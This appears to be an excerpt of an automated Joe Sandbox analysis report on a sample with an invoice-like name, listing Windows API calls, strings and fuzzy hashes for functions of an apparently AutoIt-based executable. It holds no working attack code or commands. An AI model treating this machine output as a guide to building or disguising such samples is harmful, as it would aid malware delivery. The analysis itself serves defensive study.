                                          • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                          • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                          • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
                                          • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                          • Opcode Fuzzy Hash: 7b77267de8c71d2cda51ee6c507caa4ba89c237b7189c85e33c2ab5589f655bd
                                          • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: b60a2603ebee8ab87cd8b4daa0333528d2f723e6ec57a158cad0bc7f750be268
                                          • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                          • Opcode Fuzzy Hash: b60a2603ebee8ab87cd8b4daa0333528d2f723e6ec57a158cad0bc7f750be268
                                          • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0048A903
                                          • SetTextColor.GDI32(?,?), ref: 0048A907
                                          • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                          • GetSysColor.USER32(0000000F), ref: 0048A928
                                          • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                          • GetSysColor.USER32(00000011), ref: 0048A945
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                          • SelectObject.GDI32(?,00000000), ref: 0048A964
                                          • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                          • SelectObject.GDI32(?,?), ref: 0048A97A
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                          • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                          • GetSysColor.USER32(00000011), ref: 0048AA4B
                                          • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                          • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                          • DeleteObject.GDI32(?), ref: 0048AA89
                                          • SelectObject.GDI32(?,?), ref: 0048AA8F
                                          • DeleteObject.GDI32(?), ref: 0048AA94
                                          • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                          • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                          • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                                          • Opcode Fuzzy Hash: 948a4b4d2e79d2d78f92ac1c6bb7f3af575608a4042223398e5ae106907fc06e
                                          • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                                          • CharNextW.USER32(0000014E), ref: 00488B01
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                                          • _memset.LIBCMT ref: 00488C44
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                                          • _memset.LIBCMT ref: 00488CEC
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                                          • DrawMenuBar.USER32(?), ref: 00488EC3
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                          • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                                          • Opcode Fuzzy Hash: 9ca3111b61a8f2a25a631b2648e7a23c8cea3a076a4d4f9465d98ca4008b93e0
                                          • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 004849CA
                                          • GetDesktopWindow.USER32 ref: 004849DF
                                          • GetWindowRect.USER32(00000000), ref: 004849E6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                                          • DestroyWindow.USER32(?), ref: 00484A74
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                                          • IsWindowVisible.USER32(?), ref: 00484B29
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                                          • GetWindowRect.USER32(?,?), ref: 00484B70
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                                          • CopyRect.USER32(?,?), ref: 00484BC7
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                          • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                                          • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                                          • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                                          • _wcscpy.LIBCMT ref: 00464500
                                          • _wcscmp.LIBCMT ref: 0046450B
                                          • _wcscat.LIBCMT ref: 00464521
                                          • _wcsstr.LIBCMT ref: 0046452C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                                          • _wcscat.LIBCMT ref: 00464591
                                          • _wcscat.LIBCMT ref: 00464598
                                          • _wcsncpy.LIBCMT ref: 004645C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                          • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                                          • Opcode Fuzzy Hash: 4a8df8d6b2a2f92140f321ef03a5422959a184f00704316eedf49522e9d3c310
                                          • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                          • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                          • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                          • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                          • GetStockObject.GDI32(00000011), ref: 004029CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                            • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                            • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                            • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                            • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                          • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                                          • Opcode Fuzzy Hash: a3d4fa0fb9d8ca5ab3dcd1d542b52fc38b8bb78a93eca3457e18c81271885a1f
                                          • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                                          • __swprintf.LIBCMT ref: 0045A51B
                                          • _wcscmp.LIBCMT ref: 0045A52E
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                                          • _wcscmp.LIBCMT ref: 0045A5BF
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                                          • GetDlgCtrlID.USER32(?), ref: 0045A648
                                          • GetWindowRect.USER32(?,?), ref: 0045A67E
                                          • GetParent.USER32(?), ref: 0045A69C
                                          • ScreenToClient.USER32(00000000), ref: 0045A6A3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                                          • _wcscmp.LIBCMT ref: 0045A731
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                                          • _wcscmp.LIBCMT ref: 0045A76B
                                            • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                          • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                                          • Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                                          • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                                          • _wcscmp.LIBCMT ref: 0045AF29
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                                          • _wcscmp.LIBCMT ref: 0045AF8C
                                          • _wcsstr.LIBCMT ref: 0045AF9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                                          • _wcscmp.LIBCMT ref: 0045AFE5
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                                          • _wcscmp.LIBCMT ref: 0045B065
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                                          • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                          • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                                          • Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
                                          • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                                            • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                                            • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                                            • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                                          • _wcscat.LIBCMT ref: 0048C6EE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                                          • DragFinish.SHELL32(?), ref: 0048C75E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                                          • API String ID: 169749273-3863044002
                                          • Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                          • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                          • Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
                                          • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                          • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                          • Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
                                          • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
